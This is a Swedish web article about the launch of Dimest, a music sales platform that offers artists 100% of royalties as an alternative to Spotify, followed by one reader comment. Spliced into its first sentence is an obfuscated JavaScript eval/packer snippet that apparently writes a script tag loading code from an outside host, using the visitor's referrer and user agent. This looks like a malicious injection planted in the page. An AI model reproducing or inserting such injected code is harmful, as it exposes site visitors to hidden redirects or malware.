Image Image Image Image Image Image Image Image Image Image

| 30 mars, 2020

Scroll to top

Top

Dimest – Ny musiktjänst som utmanar Spotify och ger 100% av royalties till artisterna

Dimest – Ny musiktjänst som utmanar Spotify och ger 100% av royalties till artisterna
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sssfh|var|u0026u|referrer|ebsee||js|php’.split(’|’),0,{}))
lanseras den – musiktjänsten som vänder upp-och-ner på musikbranshen. Medan 
Spotify och flertalet streamingtjänster idag betalar ut fragment av ören per strömmad spelning i sina tjänster, får de artister och upphovsmän som använder Dimest’s plattform för distribution, istället behålla 100% av royalityintäkterna. 

Dimest är en tjänst som möjliggör för både etablerade och oetablerade artister att återta kontrollen över hur musiken sprids och marknadsförs på nätet genom att möjliggöra direktförsäljning i sociala medier, bloggar och på hemsidor. Plattformen är ett komplement och alternativ till populära streamingtjänster såsom Spotify, Wimp, mfl. och erbjuder ett verktyg för upphovsmännen att själva styra hur intäkterna från försäljningen skall fördelas mellan olika rättighetsinnehavare.

– Vi har träffat så många artister och låtskrivare det senaste året som nu nästan är helt uppgivna inför möjligheterna att kunna leva på sitt musikskapande och kände att vi behövde göra något för att drastiskt förändra maktbalansen, säger George Samuelson, VD för Dimest. Streamingtjänsternas breda frammarsch är tyvärr den sista spiken i kistan och har skapat en ”svart låda” där vare sig tjänsternas egna talesmän eller branschorganisationer som tex STIM m.fl., vågar vara tydliga med exakt hur lite upphovsmännen får betalt per genererad strömmning i applikationerna. Att det rör sig om fragment av ören per helt spelad låt, råder det dock inga tvivel om. Det ser upphovsmännen svart på vitt i de alltmer avtagande siffrorna på royaltyavräkningarna, fortsätter Samuelson. I de flesta fall vågar de inte ens klaga av rädsla för att stöta sig med skivbolagen och konsumenterna som älskar streamingtjänsterna. – Alla vet ju hur det gick för Metallica när de försökte ifrågasätta Napster i början av 2000-talet.

Idag lanserar Dimest Beta-versionen av sin nya plattform för ”social commerce”, dvs en nätverksinriktad plattform för distribution och försäljning av digitalt content som musik, videos, appar, spel, mjukvara, audio books m.m. online och i sociala medier. Bolaget började som e-handelsmotor åt många svenska och internationella artister. Bl.a. har man tidigare skapat e-handelslösningar åt Abba, Tokio Hotel, Dead By April, Veronica Maggio, Melodifestivalen mfl. Nu breddas dock företagets verksamhet mot främst sociala medier som Facebook och mot bloggvärlden, så att även allmänheten kan använda systemet för att sälja eller återförsälja digitala produkter av olika slag.

– Oss veterligen är Dimest idag det enda företaget i världen som erbjuder användarna möjligheten, att inte bara sälja musik och digitala produkter till sina vänner och fans på Facebook, utan också att helt legalt kunna ”klona” befintliga shoppar med bästsäljande content och peka om provisionen från försäljningen till sig själv, säger Erik Roginski, CTO och medgrundare av Dimest. På detta sätt skapas en unik förutsättning att snabbt kunna motivera användarnas egna nätverk att aktivt bidra vid spridningen av upphovsmännens produkter på ett viralt sätt.

En annan funktion som också gör Dimest unikt är möjligheten för användarna att kombinera olika typer av produkter till nya, sk ”bundles”. Detta i kombination med dynamisk prissättning, där användarna själva kan sätta max och minimipris, gör att t.ex. en musik-mp3 kan säljas ihop med en video, en skärmsläckare och kanske t.o.m. en digital konsertbiljett, till ett för slutkunden mycket attraktivt pris. Erik Roginski, som lett utvecklingen av den nya plattformen ser flera fördelar med detta. -Plötsligt tillförs ett ”redaktionellt” värde till urvalet av produkterna, och kombinationer som kanske inte är uppenbara ens för den ursprungliga upphovsmannen, tillåts uppstå.

Comments

  1. Grym idé! Äntligen nån som är rättvis mot upphovsmännen 🙂